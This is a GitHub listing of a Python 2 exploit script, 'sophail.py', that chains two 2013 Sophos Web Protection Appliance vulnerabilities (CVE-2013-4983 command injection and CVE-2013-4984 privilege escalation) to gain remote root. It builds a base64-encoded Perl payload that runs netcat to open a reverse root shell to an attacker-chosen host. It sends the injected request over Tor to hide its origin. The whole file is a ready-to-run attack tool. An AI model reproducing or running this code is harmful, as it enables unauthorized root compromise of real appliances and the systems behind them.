-
Notifications
You must be signed in to change notification settings - Fork 59
/
sophail.py
57 lines (52 loc) · 2.35 KB
/
sophail.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/python2
# Exploit for Sophos Web Protection Appliance Command Injection
# Bugs discovered by Core Security Technologies
# I wanted an one shot remote root exploit, so I wrote one.
# CVE-2013-4983 - the remote command injection part
# CVE-2013-4984 - the local privesc part (gets root)
# infodox - insecurety.net (2013)
import requesocks # because, TOR.
import sys
import time
import threading
def banner():
""" leet ascii art here """
def generate_payload(lhost, lport):
""" This generates a payload to inject which pops a reverse connect root shell
using the CVE-2013-4984 exploit to get root, uses netcat for back connect """
command = """sudo /opt/cma/bin/clear_keys.pl fakeclientfqdn ";/bin/nc -c /bin/bash LHOST LPORT;" /fakedir" """
command = command.replace("LHOST", lhost)
command = command.replace("LPORT", lport)
runcmd = "system('%s');" %(command) # using perl's system()
encoded = runcmd.encode('base64')
encoded = encoded.strip()
encoded = encoded.replace('\n', '')
perl = """perl -MIO -e "use MIME::Base64;eval(decode_base64('%s'));";""" %(encoded)
return perl
def inject_command(ip, payload):
""" Actually does the exploitation of CVE-2013-4983 to inject out payload """
url = "https://%s/end-user/index.php?c=blocked&action=continue" %(ip)
body = "url=aHR0cDovL3d3dy5leGFtcGxlLmNvbQ%3d%3d"
body += "&args_reason=something_different_than_filetypewarn&filetype=dummy&user=buffalo"
body += "&user_encoded=YnVmZmFsbw%3d%3d&domain=http%3a%2f%2fexample.com%3b"
body += payload
body += "&raw_category_id=one%7ctwo%7cthree%7cfour"
session = requesocks.session()
session.proxies = {'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'}
session.post(url, data=body, verify=False)
def main(args):
banner()
if len(sys.argv) != 4:
sys.exit("Usage: %s <rhost> <lhost> <lport>" %(sys.argv[0]))
rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
payload = generate_payload(lhost, lport)
print "(*) Target is: %s" %(rhost)
print "(*) Sending reverse rootshell to %s:%s" %(lhost, lport)
print "(+) Injecting command, hope you have netcat listener setup"
threading.Thread(target=inject_command, args=(rhost, payload, )).start()
print "(?) got root yet?"
if __name__ == "__main__":
main(sys.argv)